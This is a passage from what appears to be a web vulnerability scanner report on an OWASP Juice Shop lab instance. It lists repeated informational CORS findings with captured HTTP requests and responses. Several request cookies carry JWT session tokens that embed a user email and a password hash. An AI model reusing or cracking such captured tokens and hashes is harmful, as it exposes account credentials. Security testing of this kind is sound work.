    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/se.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"2fd-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 765
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <defs>
    <clipPath id="a">
    <path fill-opacity=".67" d="M-53.421 0h682.67v512h-682.67z"/>
    </clipPat
    ...[SNIP]...
    15.47. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/tr.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/tr.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/tr.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"2b0-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 688
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd">
    <path fill="#f31930" d="M0 0h640v480H0z"/>
    <path d="M406.977 247.473c0 66.215-
    ...[SNIP]...
    15.48. http://192.168.61.143:3000/bower_components/flag-icon-css/flags/4x3/us.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/flag-icon-css/flags/4x3/us.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/flag-icon-css/flags/4x3/us.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/bower_components/flag-icon-css/css/flag-icon.min.css
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 29 Oct 2016 15:47:10 GMT
    ETag: W/"1835-158111f8c30"
    Content-Type: image/svg+xml
    Content-Length: 6197
    Date: Sun, 15 Jan 2017 21:49:14 GMT
    Connection: close

    <svg xmlns="http://www.w3.org/2000/svg" height="480" width="640" viewBox="0 0 640 480">
    <g fill-rule="evenodd" transform="scale(.9375)">
    <g stroke-width="1pt">
    <path d="M0 0h972.81v39.385H
    ...[SNIP]...
    15.49. http://192.168.61.143:3000/bower_components/jquery/dist/jquery.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/jquery/dist/jquery.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/jquery/dist/jquery.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Tue, 28 Apr 2015 16:03:04 GMT
    ETag: W/"1499c-14d00c472c0"
    Content-Type: application/javascript
    Content-Length: 84380
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*! jQuery v2.1.4 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */
    !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a)
    ...[SNIP]...
    15.50. http://192.168.61.143:3000/bower_components/moment/min/moment.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/moment/min/moment.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/moment/min/moment.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sun, 04 Dec 2016 05:41:33 GMT
    ETag: W/"ef85-158c85a06c8"
    Content-Type: application/javascript
    Content-Length: 61317
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    //! moment.js
    //! version : 2.17.1
    //! authors : Tim Wood, Iskren Chernev, Moment.js contributors
    //! license : MIT
    //! momentjs.com
    !function(a,b){"object"==typeof exports&&"undefined"!=typeof module
    ...[SNIP]...
    15.51. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload-shim.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/ng-file-upload/ng-file-upload-shim.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/ng-file-upload/ng-file-upload-shim.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 05 Nov 2016 04:30:52 GMT
    ETag: W/"1c5e-15832c0e460"
    Content-Type: application/javascript
    Content-Length: 7262
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*! 12.2.13 */
    !function(){function a(a,b){window.XMLHttpRequest.prototype[a]=b(window.XMLHttpRequest.prototype[a])}function b(a,b,c){try{Object.defineProperty(a,b,{get:c})}catch(d){}}if(window.FileAP
    ...[SNIP]...
    15.52. http://192.168.61.143:3000/bower_components/ng-file-upload/ng-file-upload.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/ng-file-upload/ng-file-upload.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/ng-file-upload/ng-file-upload.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 05 Nov 2016 04:30:52 GMT
    ETag: W/"9277-15832c0e460"
    Content-Type: application/javascript
    Content-Length: 37495
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*! 12.2.13 */
    !window.XMLHttpRequest||window.FileAPI&&FileAPI.shouldLoad||(window.XMLHttpRequest.prototype.setRequestHeader=function(a){return function(b,c){if("__setXHR_"===b){var d=c(this);d instan
    ...[SNIP]...
    15.53. http://192.168.61.143:3000/bower_components/ngclipboard/dist/ngclipboard.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/ngclipboard/dist/ngclipboard.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/ngclipboard/dist/ngclipboard.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Fri, 26 Feb 2016 02:29:26 GMT
    ETag: W/"280-1531b68cb70"
    Content-Type: application/javascript
    Content-Length: 640
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*! ngclipboard - v1.1.1 - 2016-02-26
    * https://github.com/sachinchoolur/ngclipboard
    * Copyright (c) 2016 Sachin; Licensed MIT */
    !function(){"use strict";var a,b,c="ngclipboard";"object"==typeof modu
    ...[SNIP]...
    15.54. http://192.168.61.143:3000/bower_components/qrcode-generator/js/qrcode.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/qrcode-generator/js/qrcode.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/qrcode-generator/js/qrcode.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Tue, 29 Mar 2016 13:26:04 GMT
    ETag: W/"afce-153c28d75e0"
    Content-Type: application/javascript
    Content-Length: 45006
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    //---------------------------------------------------------------------
    //
    // QR Code Generator for JavaScript
    //
    // Copyright (c) 2009 Kazuhiko Arase
    //
    // URL: http://www.d-project.com/
    //
    // Licens
    ...[SNIP]...
    15.55. http://192.168.61.143:3000/bower_components/underscore/underscore.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/underscore/underscore.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/underscore/underscore.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Thu, 02 Apr 2015 15:32:01 GMT
    ETag: W/"ceb7-14c7ac2ad68"
    Content-Type: application/javascript
    Content-Length: 52919
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    // Underscore.js 1.8.3
    // http://underscorejs.org
    // (c) 2009-2015 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
    // Underscore may be freely distributed under th
    ...[SNIP]...
    15.56. http://192.168.61.143:3000/css/app.css
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /css/app.css

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /css/app.css HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: text/css,*/*;q=0.1
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"1a5-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"1a5-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    15.57. http://192.168.61.143:3000/dist/juice-shop.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    15.58. http://192.168.61.143:3000/i18n/en.json
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /i18n/en.json

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /i18n/en.json HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"1159-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"1159-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    15.59. http://192.168.61.143:3000/i18n/en_US.json
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /i18n/en_US.json

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /i18n/en_US.json HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"2639-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    15.60. http://192.168.61.143:3000/public/images/JuiceShop_Logo.svg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/JuiceShop_Logo.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/JuiceShop_Logo.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"9746-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"9746-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    15.61. http://192.168.61.143:3000/public/images/carousel/1.jpg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/carousel/1.jpg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/carousel/1.jpg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"15718-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"15718-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:40:26 GMT
    Connection: close

    15.62. http://192.168.61.143:3000/public/images/carousel/2.jpg
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/carousel/2.jpg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/carousel/2.jpg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
